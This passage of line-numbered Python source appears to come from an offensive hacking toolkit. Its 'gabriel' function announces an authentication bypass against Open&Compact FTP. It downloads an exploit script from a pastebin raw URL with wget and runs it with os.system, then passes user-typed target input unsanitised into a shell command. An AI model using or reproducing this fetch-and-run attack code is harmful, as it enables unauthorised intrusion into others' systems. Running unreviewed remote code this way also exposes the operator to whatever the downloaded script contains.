()
| 264 | |
| 265 | |
| 266 | def gabriel(): |
| 267 | print("Abusing authentication bypass of Open&Compact (Gabriel's)") |
| 268 | os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py") |
| 269 | clearScr() |
| 270 | os.system("python gabriel.py") |
| 271 | ftpbypass = raw_input("Enter Target IP and Use Command :") |
| 272 | os.system("python gabriel.py %s" % ftpbypass) |
| 273 | |
| 274 | |
| 275 | def sitechecker(): |